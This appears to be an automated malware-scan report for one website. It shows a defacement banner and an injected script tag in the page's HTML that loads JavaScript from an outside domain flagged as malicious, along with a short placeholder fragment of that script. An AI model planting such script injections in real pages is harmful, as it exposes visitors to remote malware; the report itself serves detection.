Scanned pages/files
Request | Server response | Status |
http://baan-schwarz.com/ | 200 OK Content-Length: 3639 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: !--Z0nE-H AcCepT://Hacked by Panimin Ardiansyah//-- <!--[!WE ARE HERE ONLY TO WARN NOT TO DESTROY!]--> <!--[!SALAM, UNDER CONSTRUCTIONS. WE WILL COME BACK!]--> <!--//contact:japext87@gmail.com//--> <html> <head><script src="http://d.webshieldonline.com/l/load.js"></script> <!--Z0nE-H AcCepT://Hacked by Panimin Ardiansyah//--> <title>Ti pikir karo gae kotang</title> <!--Z0nE-H AcCepT://Hacked by Panimin Ardiansyah//--> <meta name="description" content="[!WE ARE HERE ONLY TO WARN NOT TO DESTROY!]"> <!--Z0nE-H AcCepT://Hacked by Panimin Ardiansyah//--> <meta name="keywords" content="Hacked by Panimin Ardiansyah"> ...[3457 bytes skipped]... | ||
http://d.webshieldonline.com/l/load.js | 200 OK Content-Length: 16023 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var data1 = { ns4: "[#[NAMESHORT]#]" , id: "[#[ID]#]" , ver: "[#[VERSION]#]" , base: "[#[HOST]#]" , session: "[#[SESSION]#]" }; var data2 = { ns4: "[#[NAMESHORT]#]" , id: "[#[ID]#]" , ver: "[#[VERSION]#]" , base: "[#[HOST]#]" , session: "[#[SESSION]#]" }; var data3 = { ns4: "[#[NAMESHORT]#]" })(); Antivirus reports:
| ||
http://baan-schwarz.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: baan-schwarz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Sep 2014 11:01:28 GMT
Server: Apache/2.2.27 (Unix)
Content-Type: text/html
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: baan-schwarz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Sep 2014 11:01:28 GMT
Server: Apache/2.2.27 (Unix)
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: baan-schwarz.com
Referer: http://www.google.com/search?q=baan-schwarz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: baan-schwarz.com
Referer: http://www.google.com/search?q=baan-schwarz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=baan-schwarz.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://baan-schwarz.com/
Result: baan-schwarz.com is not infected or malware details are not published yet.
Result: baan-schwarz.com is not infected or malware details are not published yet.